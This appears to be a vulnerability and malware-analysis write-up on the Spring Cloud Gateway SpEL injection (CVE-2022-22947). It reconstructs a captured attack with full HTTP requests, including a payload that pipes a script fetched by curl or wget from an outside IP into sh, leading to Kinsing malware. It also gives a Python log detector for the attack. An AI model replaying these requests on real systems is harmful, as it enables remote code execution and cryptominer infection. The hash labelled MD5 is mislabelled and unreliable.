POC details: 48d4539e8a2d7e9afd8713196e5f40c5571f9439

Source
Related vulnerability
Title: VMware Spring Cloud Gateway code injection vulnerability (CVE-2022-22947)
Description: VMware Spring Cloud Gateway is a library from the US company VMware for building an API gateway on top of Spring WebFlux. VMware Spring Cloud Gateway contains a code injection vulnerability; a remote attacker can exploit it by sending crafted requests, which allows arbitrary remote commands to be executed on the remote host.
Introduction
# CVE-2022-22947

CVE-2022-22947 (Spring-Cloud-Gateway)

In the first quarter of 2022, an interesting and critical (base score of 10.0) Spring Cloud Gateway code injection vulnerability was discovered. It leverages the Actuator API to perform SpEL injection, potentially leading to system compromise.

Affected: Spring Cloud Gateway versions before 3.1.1 and 3.0.7 (fixed in 3.1.1+ and 3.0.7+).

In Spring Cloud Gateway, applications are vulnerable to a code injection attack IF the Gateway Actuator endpoint is enabled, exposed and unsecured.

## VULNERABILITY FLOW GRAPH 
![spring](https://github.com/Sumitpathania03/CVE-2022-22947/assets/126046383/18e9142e-a2b1-4708-abdd-bfebab060841)
## PCAP ANALYSIS
1. The attacker sends a POST request with a JSON body to create a new route in the gateway; the JSON configuration sets a response header filter on that route.

```
POST /actuator/gateway/routes/xwpdsdeb HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/json
Content-Length: 372

{"id": "BuOHOGeywH", "filters": [{"name": "AddResponseHeader", "args": {"name": "Result", "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"/bin/sh\",\"-c\",\"(curl -s 127.0.0.1/sum||wget -q -O- sum/scg.sh)|sh\"}).getInputStream()))}"}}], "uri": "http://example.com", "order": 0}
```
RESPONSE:
```
HTTP/1.1 201 Created
Location: /routes/xwpdsdeb
content-length: 0
```
As we can see in the JSON body, the value of the response header is obtained by evaluating this SpEL expression:
```
"value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"/bin/sh\",\"-c\",\"(curl -s 127.0.0.1/sum||wget -q -O- sum/scg.sh)|sh\"}).getInputStream()))}"}}]
```
and inside the exec( ) call there is a composite shell command, which gives remote code execution.

2. The attacker then sends a POST request to refresh all the routes.
```
POST /actuator/gateway/refresh HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/json
Content-Length: 0
```
RESPONSE:
```
HTTP/1.1 200 OK
```
3. The attacker then sends a GET request for the newly created route, which evaluates the expression in the response header filter and executes the RCE command.
```
GET /actuator/gateway/routes/xwpdsdeb HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/json
```
RESPONSE:
```
HTTP/1.1 200 OK
Content-Type: application/json
Date: Wed, 27 Dec 2023 09:45:00 UTC
Content-Length: 202

{"predicate": "RouteDefinitionRouteLocator$$Lambda$1046/0x0000000840610840", "route_id": "xwpdsdeb", "filters": ["[[AddResponseHeader Result = ''], order = 1]"], "uri": "10.0.2.15/xwpdsdeb", "order": 0}
```
The 200 OK response indicates that the RCE command has been executed successfully.

4. The attacker then sends a DELETE request to remove that route.
```
DELETE /actuator/gateway/routes/xwpdsdeb HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/json
Content-Length: 0
```
RESPONSE:
```
HTTP/1.1 200 OK
CONNECTION: close
Date: Wed, 27 Dec 2023 09:45:01 UTC
Content-Length: 4855
```
HTTP 200 OK indicates that the route has been deleted successfully.
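Taken together, the four requests above (create route, refresh, read route, delete route) form a sequence a defender can look for in gateway access logs, independently of the exact payload. The script below is an added example, not part of the original report or of Spring Cloud Gateway. It assumes a constructed, simplified log format (timestamp, client IP, method, path, status and an optional JSON body; real access logs only carry bodies when request logging is enabled, so that field is an assumption), flags route definitions whose filter arguments contain the SpEL template marker `#{`, and flags any client that creates a route, refreshes, then reads it (noting a subsequent delete). The sample lines reuse the page's route id xwpdsdeb with constructed RFC 5737 addresses.

```python
import json
import re
from collections import defaultdict

# Constructed, simplified access-log format used only by this example:
#   "<iso-timestamp> <client-ip> <method> <path> <status> [<json body>]"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) (?P<method>[A-Z]+) (?P<path>\S+) "
    r"(?P<status>\d{3})(?: (?P<body>.*))?$"
)
ROUTE_RE = re.compile(r"^/actuator/gateway/routes/(?P<route_id>[^/?#]+)$")
REFRESH_PATH = "/actuator/gateway/refresh"


def parse_line(line):
    """Parse one log line into a dict, or return None for lines in another format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["status"] = int(ev["status"])
    return ev


def _strings(obj):
    """Yield every string value nested anywhere inside decoded JSON."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for v in obj.values():
            yield from _strings(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from _strings(v)


def spel_in_route_definition(body):
    """True if a route-definition body carries a SpEL expression in its filters.

    Filter arguments are plain strings; a legitimate AddResponseHeader value
    has no reason to contain the SpEL template marker '#{'.
    """
    if not body:
        return False
    try:
        doc = json.loads(body)
    except ValueError:
        return "#{" in body  # not JSON: fall back to a raw substring check
    filters = doc.get("filters", []) if isinstance(doc, dict) else []
    return any("#{" in s for s in _strings(filters))


def _in_order(seen, wanted):
    """True if the stage names in `wanted` appear in `seen` in that order."""
    it = iter(seen)
    return all(any(s == w for s in it) for w in wanted)


def analyse(lines):
    """Run both detections over log lines and return a list of alert dicts."""
    alerts = []
    stages = defaultdict(list)  # (client-ip, route_id) -> ordered stage names
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        route = ROUTE_RE.match(ev["path"])
        if route and ev["method"] == "POST":
            rid = route["route_id"]
            stages[(ev["ip"], rid)].append("create")
            if spel_in_route_definition(ev["body"]):
                alerts.append({"rule": "spel-in-route-definition",
                               "ip": ev["ip"], "route_id": rid})
        elif ev["path"] == REFRESH_PATH and ev["method"] == "POST":
            # A refresh activates every route this client has defined so far
            for (ip, _rid), seen in stages.items():
                if ip == ev["ip"] and "create" in seen:
                    seen.append("refresh")
        elif route and ev["method"] == "GET":
            stages[(ev["ip"], route["route_id"])].append("read")
        elif route and ev["method"] == "DELETE":
            stages[(ev["ip"], route["route_id"])].append("delete")
    for (ip, rid), seen in stages.items():
        if _in_order(seen, ("create", "refresh", "read")):
            rule = "route-create-refresh-read"
            if "delete" in seen:
                rule += "-delete"
            alerts.append({"rule": rule, "ip": ip, "route_id": rid})
    return alerts


# Constructed sample log (RFC 5737 addresses; mirrors the four-step sequence above,
# plus a benign route definition from a second client that must not alert)
SAMPLE_LOG = """
2023-12-27T09:44:58Z 203.0.113.5 POST /actuator/gateway/routes/xwpdsdeb 201 {"id": "xwpdsdeb", "filters": [{"name": "AddResponseHeader", "args": {"name": "Result", "value": "#{new java.lang.String('x')}"}}], "uri": "http://example.com", "order": 0}
2023-12-27T09:44:59Z 203.0.113.5 POST /actuator/gateway/refresh 200
2023-12-27T09:45:00Z 203.0.113.5 GET /actuator/gateway/routes/xwpdsdeb 200
2023-12-27T09:45:01Z 203.0.113.5 DELETE /actuator/gateway/routes/xwpdsdeb 200
2023-12-27T09:50:00Z 198.51.100.7 POST /actuator/gateway/routes/orders 201 {"id": "orders", "filters": [{"name": "AddResponseHeader", "args": {"name": "X-Env", "value": "prod"}}], "uri": "http://orders.internal", "order": 0}
2023-12-27T09:50:01Z 198.51.100.7 GET /actuator/gateway/routes/orders 200
""".strip().splitlines()

if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```

The body-based rule catches the injection even if the attacker never triggers it; the sequence rule catches the activity even when bodies are not logged, since it needs only method, path and client address. Both fire only on the first client in the sample; the second client defines a route with a plain header value and never refreshes, so it produces nothing.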


## LOG_DATA

## DECODED SHELLCODE:
```
POST /actuator/gateway/routes/BuOHOGeywH HTTP/1.1
Host: 180.188.253.170:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Content-Length: 411
Content-Type: application/json
Accept-Encoding: gzip

{
	 "id": "BuOHOGeywH",
	 "filters": [{
	   "name": "AddResponseHeader",
	   "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"/bin/sh\",\"-c\",\"(curl -s 94.103.87.71/scg.sh||wget -q -O- 94.103.87.71/scg.sh)|sh\"}).getInputStream()))}"}
	   }],
	 "uri": "http://example.com",
	 "order": 0
	}
```
After decoding this shellcode I found a wget URL of a script. I then manually downloaded that script and, after analysing it, I found a download URL for Kinsing malware.


![SP](https://github.com/Sumitpathania03/CVE-2022-22947/assets/126046383/52410dba-8ead-4cad-8c08-d165c23eb1ad)


From that URL I downloaded the Kinsing malware as a zip file for further analysis. I then analysed the sample with
MD5 value = 787e2c94e6d9ce5ec01f5cbe9ee2518431eca8523155526d6dc85934c9c5787c
and here is what I got:

![SP](https://github.com/Sumitpathania03/CVE-2022-22947/assets/126046383/b8837566-43cd-4349-8a27-1681b59cab7b)


![SP](https://github.com/Sumitpathania03/CVE-2022-22947/assets/126046383/1802b812-62e6-430a-8851-22aa32ff16e7)



File snapshot

```
[4.0K] /data/pocs/48d4539e8a2d7e9afd8713196e5f40c5571f9439
├── [5.2K] README.md
└── [896K] spring_cloud_report.docx

0 directories, 2 files
```